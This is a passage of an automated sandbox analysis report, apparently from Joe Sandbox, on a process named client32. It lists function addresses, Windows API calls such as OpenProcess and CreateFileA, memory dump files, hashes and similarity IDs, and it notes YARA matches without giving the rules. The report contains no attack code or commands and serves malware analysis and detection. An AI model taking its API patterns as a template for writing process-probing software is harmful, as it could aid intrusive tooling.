                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CreateFolderPathwsprintf$CloseExecuteHandleModuleNameShell
                                                                                                                                                                                                    • String ID: "%sWINST32.EXE"$"%sWINSTALL.EXE"$/EM$open
                                                                                                                                                                                                    • API String ID: 816263943-3387570681
                                                                                                                                                                                                    • Opcode ID: 474e4a5f26d8134d6f28c1743d0d9889b4922dd9f32edc34b04f7a1facad78e0
                                                                                                                                                                                                    • Instruction ID: 425802901d1907c5be7fd2b9c3bfd6c49e25210cb6f83e26e9bc69af70aaa39f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 474e4a5f26d8134d6f28c1743d0d9889b4922dd9f32edc34b04f7a1facad78e0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B411C875E0131EABDB11EBB5CC45FAAF7A89B04708F5041F5E91597181EB31B9048B91
                                                                                                                                                                                                    Function 1108B240 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindWindowA.USER32(?,00000000), ref: 1108B274
                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,04000000), ref: 1108B293
                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000440,00000000,04000000,110EAA59,?,04000000,00000000,?,00000000,00000000,?,00000000,110EA93D,?,110EAA59,0000070B), ref: 1108B2A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ProcessWindow$FindOpenThread
                                                                                                                                                                                                    • String ID: Error. NULL hToken$Progman
                                                                                                                                                                                                    • API String ID: 3432422346-976623215
                                                                                                                                                                                                    • Opcode ID: 059be4ecc652e061e66f05b14170a3aabe5fe35332d29859c985ce1771b9b1d6
                                                                                                                                                                                                    • Instruction ID: 4ee04209679d4ac62f627f7e7d6e091cb71ded9887b28b928329626620bf84cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 059be4ecc652e061e66f05b14170a3aabe5fe35332d29859c985ce1771b9b1d6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25119675E0122D9BD751DFA4D885BEEF7B8EF4C218F1081A9EE16E7240DB31A900C7A5
                                                                                                                                                                                                    Function 110033B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,00002EFF), ref: 110033BE
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110033EA
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 1100340C
                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 1100341A
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                                    • API String ID: 468487828-934300333
                                                                                                                                                                                                    • Opcode ID: 4bbcc618e98ef98e9cc3961995019deef03965a6bc052ed1dd22c5c51f3fda12
                                                                                                                                                                                                    • Instruction ID: 24594387450efb2066981165f5525a36b814e5bc10ecad7e7e85ab1dcfd37f25
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bbcc618e98ef98e9cc3961995019deef03965a6bc052ed1dd22c5c51f3fda12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71F0E93AF4066677D61352666CC5F4FE66C8B91AA8F110071F614BA684EE11A80051EA
                                                                                                                                                                                                    Function 110032C0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,00002EF9), ref: 110032CD
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110032F3
                                                                                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 11003317
                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 11003329
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                                    • API String ID: 4241058051-934300333
                                                                                                                                                                                                    • Opcode ID: 8e539d231b0ab8dca2ce90518cca292f254de65541413167144fb169119e5813
                                                                                                                                                                                                    • Instruction ID: d79372c4e35f96c7b6d882990e3a1748ca0edf213b09d886e21f34e7a2ab119d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e539d231b0ab8dca2ce90518cca292f254de65541413167144fb169119e5813
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56F0E93AF4052777C21352663C49F8FF6684B81BA8F154071F911B5645EE14640051E6
                                                                                                                                                                                                    Function 110ED520 Relevance: 12.1, APIs: 8, Instructions: 129fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,08000080,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 110ED563
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                    • Opcode ID: 912ebd34f1d1380a87c8c5cba27fd19df60eae7bcd2f60170d1a9065acc2d3f0
                                                                                                                                                                                                    • Instruction ID: 402bb12deb77936e5eeacb062a8de3ed675085140f67c3334ce786458653fa44
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 912ebd34f1d1380a87c8c5cba27fd19df60eae7bcd2f60170d1a9065acc2d3f0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3141A772E012199FD710CFA9D885BAEF7F8EF84719F10856AE916DB240DB35E500CB91
                                                                                                                                                                                                    Function 687F09EA Relevance: 12.1, APIs: 8, Instructions: 99COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtCompareStringW.MSVCR100(?,00001001,00000000,?,?,?,?), ref: 687F5FBC
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 6880C74B
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 6880C756
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 6880C765
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 6880C770
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 6880C77F
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 6880C78A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$CompareString__crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 380063240-0
                                                                                                                                                                                                    • Opcode ID: 92f31d898ed74495dbdc95cdabc12c4a18cb5bf2ad594a599a3ba411d492cd8b
                                                                                                                                                                                                    • Instruction ID: 70551521a698f43a33e63cd0e0fe638c5a2c0aec0d0284099421fbb5f79ab430
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92f31d898ed74495dbdc95cdabc12c4a18cb5bf2ad594a599a3ba411d492cd8b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F31D675A0015ADBEB115FAECE8477A36A5AF01364FD04672E4709B3D2DB30C842A7B1
                                                                                                                                                                                                    Function 6883693E Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _mbsrchr.MSVCR100(688883F4,0000002E,688883F4,00000012), ref: 68836957
                                                                                                                                                                                                      • Part of subcall function 688415E3: __mbsrchr_l.LIBCMT(00000400,6882F396,00000000,?,6882EF5D,6882F396,0000002E,?,?,?,6882F396,00000400,?), ref: 688415F0
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(688883F4,00000012), ref: 6883696E
                                                                                                                                                                                                    • strtoul.MSVCR100(00000001,00000000,00000020,00000000,688883F4,00000012), ref: 6883697F
                                                                                                                                                                                                    • __ultoa_s.LIBCMT(?,?,00000008,00000020,00000000,688883F4,00000012), ref: 688369A8
                                                                                                                                                                                                    • strcpy_s.MSVCR100(00000001,00000000,?,?,?,?,?,00000000,688883F4,00000012), ref: 688369BF
                                                                                                                                                                                                    • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,688883F4,00000012), ref: 688369D0
                                                                                                                                                                                                    • _errno.MSVCR100(68836B18,00000010,68836B6A,00000000,?,00000002,7FFFFFFF,00000000), ref: 688369E7
                                                                                                                                                                                                    • _errno.MSVCR100(68836B18,00000010,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,688883F4,00000012), ref: 68836A02
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$__invoke_watson__mbsrchr_l__ultoa_s_invalid_parameter_noinfo_mbsrchrstrcpy_sstrtoul
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2319564628-0
                                                                                                                                                                                                    • Opcode ID: 916c723845e48d60c3ee0003b90ef4eba32eaf6129fef154475316d7ea1c3967
                                                                                                                                                                                                    • Instruction ID: 33d67e2737113f51d0ad4935595b54516e63610a7a94ab79bff0cabcd0b959c2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 916c723845e48d60c3ee0003b90ef4eba32eaf6129fef154475316d7ea1c3967
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A321C875A00228AFE700DFBD8D8DAAE77A8BF45758F904925F91497180EF70A90196E1
                                                                                                                                                                                                    Function 110ED140 Relevance: 12.1, APIs: 8, Instructions: 84filememoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,1112E5E6,00000000,?), ref: 110ED158
                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,1112E5E6,00000000,?), ref: 110ED16D
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110ED18F
                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 110ED19C
                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110ED1AB
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 110ED1BB
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 110ED1D5
                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 110ED1DC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3489003387-0
                                                                                                                                                                                                    • Opcode ID: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
                                                                                                                                                                                                    • Instruction ID: db3aae85cbeca24dbd9e457748b34ba45ed53121808abb5c6b0ad0e7882c1e57
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9218332A0111AAFD701DFA9C889BFEF7BCEB45219F1040ABFB05D6140DB34990187A2
                                                                                                                                                                                                    Function 687EAA3C Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0,?,687EB911), ref: 687EAA51
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0,?,687EB911), ref: 687EAA5E
                                                                                                                                                                                                    • _msize.MSVCR100(00000000,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687EAA7B
                                                                                                                                                                                                      • Part of subcall function 687E25DA: HeapSize.KERNEL32(00000000,00000000,?,687EAA80,00000000,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?), ref: 687E25F4
                                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687EAA97
                                                                                                                                                                                                    • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687EAA9F
                                                                                                                                                                                                    • _realloc_crt.MSVCR100(00000000,00000800,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687F283A
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,687EAA03,?,687EAA20,0000000C,687EC551,?,?,687EC455,688070E0), ref: 687F2850
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 765448609-0
                                                                                                                                                                                                    • Opcode ID: 4521c84f932265945a4d963d69eb4af0fce62f9f37fef1e8332e5590016a76c4
                                                                                                                                                                                                    • Instruction ID: ba7d681cfba751cd4b49e3bc3444597b7b6a76dc242f5075cdfba3373435a592
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4521c84f932265945a4d963d69eb4af0fce62f9f37fef1e8332e5590016a76c4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC11E776614316EFDB109F79CEC488E7BE9FB492603510536E405E7200EB30ED02CAE4
                                                                                                                                                                                                    Function 1113F2C0 Relevance: 12.1, APIs: 8, Instructions: 70windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 1113F2CB
                                                                                                                                                                                                    • GetSubMenu.USER32(?,00000000), ref: 1113F2E8
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 1113F309
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000001), ref: 1113F312
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 1113F31C
